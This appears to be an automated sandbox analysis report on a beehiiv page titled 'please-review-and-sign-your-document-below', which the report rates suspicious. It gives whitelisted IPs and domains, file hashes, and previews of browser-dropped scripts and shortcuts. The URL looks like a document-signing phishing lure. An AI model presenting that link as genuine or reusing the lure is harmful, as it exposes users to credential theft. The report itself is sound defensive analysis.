                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:SUS
                                                                                                                                            Classification:sus22.win@26/399@106/20
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 216.58.206.35, 108.177.15.84, 216.58.206.46, 142.250.186.78, 172.217.18.14, 216.58.212.170, 142.250.186.67, 2.21.22.176, 2.21.22.171, 2.21.22.155, 2.21.22.178, 2.21.22.170, 2.21.22.177, 2.21.22.154, 2.21.22.179, 2.21.22.153, 142.250.186.170, 172.217.18.10, 142.250.185.234, 142.250.184.202, 142.250.185.74, 142.250.186.74, 142.250.184.234, 142.250.186.138, 142.250.185.138, 142.250.186.42, 216.58.206.74, 142.250.185.106, 142.250.185.202, 172.217.16.202, 142.250.185.170, 216.58.212.138, 216.58.206.78, 23.192.229.135, 23.192.229.139, 23.192.229.143, 23.192.229.142, 23.192.229.133, 23.192.229.145, 23.192.229.144, 23.192.229.136, 23.192.229.134, 23.192.229.138, 23.192.229.137, 23.192.229.141, 2.23.227.213, 2.23.227.219, 2.16.241.144, 2.16.241.139, 142.250.184.206, 142.250.185.206, 216.58.212.174, 20.190.160.17, 40.126.32.76, 40.126.32.133, 20.190.160.14, 20.190.160.20, 40.126.32.74, 40.126.32.72, 40.126.32.68, 13.107.6.156, 2.23.227.214, 2.23.227.223, 40.126.32.136, 20.190.1
                                                                                                                                            • Excluded domains from analysis (whitelisted): greenid-prod-pme.eastus2.cloudapp.azure.com, azurefd-t-fb-prod.trafficmanager.net, lgincdnmsftuswe2.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, www.tm.aadcdn.msftauth.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, ak.privatelink.msidentity.com, lf16-tiktok-web.tiktokcdn-us.com.edgesuite.net, clients2.google.com, onedscolprdfrc04.francecentral.cloudapp.azure.com, login.live.com, update.googleapis.com, fonts.googleapis.com, e329293.dscd.akamaiedge.net, fpt2.microsoft.com, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, client.px-cloud.net.edgekey.net, onedscolprdcus15.centralus.cloudapp.azure.com, onedscolprdneu08.northeurope.cloudapp.azure.com, lgincdnvzeuno.ec.azureedge.net, aadcdn.msauth.net, a2047.mm3.akamai.net, eu.events.data.trafficmanager.net, edge
                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            • VT rate limit hit for: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            No simulations
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:14:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2673
                                                                                                                                            Entropy (8bit):3.9920961773432144
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8OQdvTHnTHzidAKZdA1FehwiZUklqehYy+3:8hz5Hy
                                                                                                                                            MD5:DE91841577C3AD02D17F10561D2B3C1E
                                                                                                                                            SHA1:7D2225215861DEC62386642DB991DEBE815DC4DB
                                                                                                                                            SHA-256:48200213BB09607208F0B6004FD0DA3C5B5BA0B980A8576D08263F4165DF721F
                                                                                                                                            SHA-512:EE54256014CBBE292B5BC6BC529FF8F9BDED11D8AA14A250552B3D66F7DA3B932BB0761D490100557D6DEDF5FCF37F903C0B66C0FFE889D92448E68A2E2CDCDE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:L..................F.@.. ...$+.,.....6Ryg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:14:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2675
                                                                                                                                            Entropy (8bit):4.008045467005605
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:84QdvTHnTHzidAKZdA1seh/iZUkAQkqeh3y+2:8DzP9QWy
                                                                                                                                            MD5:3E53B3849430262F8452CBDA02394DD3
                                                                                                                                            SHA1:435F4560C23A5FE0E9BDC19D9C14DE0A76C507BE
                                                                                                                                            SHA-256:5F0FA2DE540F160EE507790BDF0F1E6CE32F5E553D2611612F69D2F1F84D5F06
                                                                                                                                            SHA-512:A55A40E23386F380C9D71C36C6EB72DFD944AC04437914AE7F19E243397F17F4AEF3983256C25938BD00E0401CB5EF6837C76227865D9EF1761D09A8BDB6E31E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:L..................F.@.. ...$+.,......)Ryg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2689
                                                                                                                                            Entropy (8bit):4.017108939876826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8BQdvTHnAHzidAKZdA14meh7sFiZUkmgqeh7s1y+BX:82zenDy
                                                                                                                                            MD5:218E70BFC3B169CD88ED038C099B0BDE
                                                                                                                                            SHA1:1A19F28D4C08EF18F3037B8F5B66F828E2550995
                                                                                                                                            SHA-256:644078A3DF14F43C5A4C05D254C25889EDDF0E63A5C1BD7E536048B3A064D70A
                                                                                                                                            SHA-512:91BBEAE4DDB28A0D9216D49B140498BF0EE01803E471E5FEFFA56C82F8EBDB4450164BF94B01F24C1A8EAEEA5D5D6EC3820C4F50EDF575D63B2F0D37BCC2BFC0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:14:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2677
                                                                                                                                            Entropy (8bit):4.005737978555692
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8uQdvTHnTHzidAKZdA1TehDiZUkwqeh7y+R:8Bz8Ny
                                                                                                                                            MD5:04CFEEDF854E449FBFC6E72D569292A9
                                                                                                                                            SHA1:759642CA6EDD97511F11C1025429DC221D04DA60
                                                                                                                                            SHA-256:0C2DCD179C22E71A8265B832882A99B024B26E9EDFC803F7E30AAF67D6FBD547
                                                                                                                                            SHA-512:893CC94BA24FC09AB0FFE3C56D4A288AE385C007CD040CA6071E838C1B514D246DB15B750BC3D2876C676859A6D40FDCDF11AE50FEE1FCB3B148579BBDC0F26C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:L..................F.@.. ...$+.,....M.#Ryg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:14:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2677
                                                                                                                                            Entropy (8bit):3.9937761476706535
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8BQdvTHnTHzidAKZdA1dehBiZUk1W1qehxy+C:82zs9Ry
                                                                                                                                            MD5:14F65B65C4DEDA2314DA96B50556D486
                                                                                                                                            SHA1:927F22F4D4610301DF65C5FD5E4DAEDF4083590F
                                                                                                                                            SHA-256:91ECC4582A3598A07A7A5E9BC2997CA1BAC5CDDF0232A7DBB400BF44D984158E
                                                                                                                                            SHA-512:08F94C9FE72C66AD32F49B54978BE77930BD192A63E1B65DACC020D3D3E6437A715F949A59FE7D9859091641DA4F791CF734AF6F400B48088527CA1E0DF02994
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:L..................F.@.. ...$+.,....Q>0Ryg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 17:14:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2679
                                                                                                                                            Entropy (8bit):4.003463106984777
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:8MQdvTHnTHzidAKZdA1duTeehOuTbbiZUk5OjqehOuTbDy+yT+:8vzeTfTbxWOvTbDy7T
                                                                                                                                            MD5:32DB70BC9E9FCA9B66750230E78FF4C4
                                                                                                                                            SHA1:953947DA7895B64595B4C5B68CC24488CBE22830
                                                                                                                                            SHA-256:FC499B450EB2BE6862252746EA673AFDFE72152910BE1996BAB83BACA5B65A3B
                                                                                                                                            SHA-512:236C43058153797981F93E9A32541CB810CF8A49A70F37C716888A210F85707F343DCF221490CDA17018294492AB41485FC0C74B5DBC0A5509D078D0E9F90A08
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:L..................F.@.. ...$+.,.......Ryg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):48316
                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (44751)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):45064
                                                                                                                                            Entropy (8bit):5.083548901916587
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:nI3IQpxtZj6yHXhflZdWVlyAZsHuGRaJLXsm02mT4GwLG+dTws8jLdYp0oW7hbn2:InpkyHv0y2G+pqjLW+xf2MuCwSS
                                                                                                                                            MD5:2FBF4F353D700412C39F8A044EED928C
                                                                                                                                            SHA1:F189A744B7BAF1D28C2E2290512597DE4EF6C60B
                                                                                                                                            SHA-256:AF901BCF60F667A58F95A15D388D4F3C98E593EC8ADB9BDFF2A3777E4B26B4CF
                                                                                                                                            SHA-512:018F9A6FAEDA89C326982282E053AF767913CC59CF10661DB1F9F3841A269B5DAC94FE8AB7A687142430D45DDAE27E59352DA98D80E3AD85A62FD693D578E9CC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/manifest-bfc7ba9e.js
                                                                                                                                            Preview:window.__remixManifest={"entry":{"module":"/assets/entry.client-CuBsnk-1.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/assets/i18next-BV1g0mjb.js","/assets/components-Oj2xMfGE.js","/assets/context-CxfOs_9L.js"],"css":[]},"routes":{"root":{"id":"root","path":"","hasAction":false,"hasLoader":true,"hasClientAction":false,"hasClientLoader":false,"hasErrorBoundary":true,"module":"/assets/root-C5Mn_uH-.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/assets/i18next-BV1g0mjb.js","/assets/components-Oj2xMfGE.js","/assets/context-CxfOs_9L.js","/assets/index-x2da_zcv.js","/assets/index-BdpAPpdN.js","/assets/useTranslation-CfKJAmGY.js","/assets/index-CqJN8iQq.js","/assets/StatusInputs-JkVhk_jg.js","/assets/PageProvider-uKxoiNdl.js","/assets
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1435
                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (9726)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10089
                                                                                                                                            Entropy (8bit):5.251832707456976
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:9Bq0j0sOnvxYmG8PIsR/p5IBlz8SMv5S/hUp/g2a3xvKwuIROKqheRX52RXWjCZl:/0sOPIsRsOs32/w3UeRp2YWZNSBU
                                                                                                                                            MD5:9A8F4D51D79DD6D3234287D878B1C84D
                                                                                                                                            SHA1:110032066B905CA07010318EA7AA36F354B3AF9C
                                                                                                                                            SHA-256:872019D9CB9357FC372941D263E53FC0632D8931BF671EA5ABC5F8846EE06655
                                                                                                                                            SHA-512:85EA7C67DE5B8F467AD5309DDD83EF92EBA1A5B6300B3BEEA4C7D882E0F3E897269D6919A05712EA2FB2EF0AAAE7FA87B70675F925E7D621550C3BDFE9A1B330
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/transition-y-5XFFuu.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aad4556e-25e7-5016-bf1d-13a319293c6b")}catch(e){}}();.import{r as a,e as E}from"./index-D6da9p6-.js";import{h as he,T as be,o as Ee,a as _}from"./use-is-mounted-BaHv16bB.js";import{s as R,u as F,b as J,l as Q,O as we,U as W,y as le,v as P,f as ie,o as L,g as re,C as ae}from"./keyboard-CaEu2o0u.js";import{p as oe}from"./bugs-DVQzBh-s.js";function Te(){return/iPhone/gi.test(window.navigator.platform)||/Mac/gi.test(window.navigator.platform)&&window.navigator.maxTouchPoints>0}function Ce(){return/Android/gi.test(window.navigator.userAgent)}function Fe(){return Te()||Ce()}function k(e,t,r){let l=R(t);a.useEffect(()=>{function c(f){l.current(f)}return document.addEventListener(e,c,r),()=>document.removeEventListener(e,c,r)},[e,r])}function Le(e,t,r){let l=R(t);a.useEffect(()=>{functio
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):61052
                                                                                                                                            Entropy (8bit):7.996159932827634
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
